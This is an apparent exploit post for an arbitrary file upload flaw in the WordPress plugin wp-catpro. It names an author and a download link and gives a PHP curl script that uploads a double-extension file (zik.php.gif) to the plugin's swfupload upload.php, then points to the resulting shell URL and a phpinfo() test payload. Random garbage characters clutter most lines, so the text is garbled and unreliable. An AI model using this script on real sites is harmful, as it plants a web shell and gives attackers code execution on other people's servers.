Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability1 u' O5 t, S* A+ W
#-----------------------------------------------------------------------
8 f r0 c5 {. o# _! ]6 a6 K& [ # b# w+ v' B! l ^1 P6 [" p
作者 => Zikou-16. P" ^. \( J) A- ?- A
邮箱 => zikou16x@gmail.com
# W8 c! r1 {( ~& d测试系统 : Windows 7 , Backtrack 5r3
a3 J7 `8 O/ y: y下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip. Z- p3 a/ f' i! E% A; n) C3 |
####
2 n: ~4 Y. R# V9 c 2 H' ~: V: A6 _; g$ N$ W
#=> Exploit 信息:. Q2 B7 L$ w6 q6 }3 w/ O
------------------& }- C( ` |+ q4 t
# 攻击者可以上传 file/shell.php.gif
4 E! I4 @; R' r/ a( h# ("jpg", "gif", "png") // Allowed file extensions
) ?! l G( S j2 z8 n9 ^9 @# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
4 v. a# y6 A/ f6 q! G/ \; o# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
" A& y0 c/ ^5 V# b: N( p------------------
9 K+ E: [" V7 c* v
. Y6 R4 r6 j& A#=> Exploit* w- r, w+ [8 R7 j" n, b4 j# v( U% w
-----------7 R& d/ \5 A5 y& z
<?php
7 O1 c% g( H0 _8 F) B
' m9 ]. Y( a: [$ |$uploadfile="zik.php.gif";
* S$ s* y# f$ A* P& F& W$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");" S' k/ m! h! ?
curl_setopt($ch, CURLOPT_POST, true);& O& Q/ }8 H3 r* C8 X% r) Z5 e
curl_setopt($ch, CURLOPT_POSTFIELDS,
' O6 N& M/ z' u- W8 Z+ d9 xarray('Filedata'=>"@$uploadfile",$ e6 {9 \6 q9 O' U
'folder'=>'/wp-content/uploads/catpro/'));. v& `8 J. C+ X6 }/ k7 n; S/ U
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4 p3 A" U) y) q/ I* v3 N: A$postResult = curl_exec($ch);1 o# W$ L0 ~6 E0 G5 f. J+ G
curl_close($ch);" I9 S! n7 K; p
2 W) `. y |# Y9 J4 R* [" Fprint "$postResult";* X( Y6 H% q" W4 d) J1 {9 H
& Y" _9 [$ n% Y5 q
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
& w0 L0 V. [4 a/ K; a' b u ?>$ }& _4 F1 _" Y, N& E- ^
<?php
, _! G r7 S- z; z% vphpinfo();! ^$ X9 m; C3 g# m+ q. M
?> |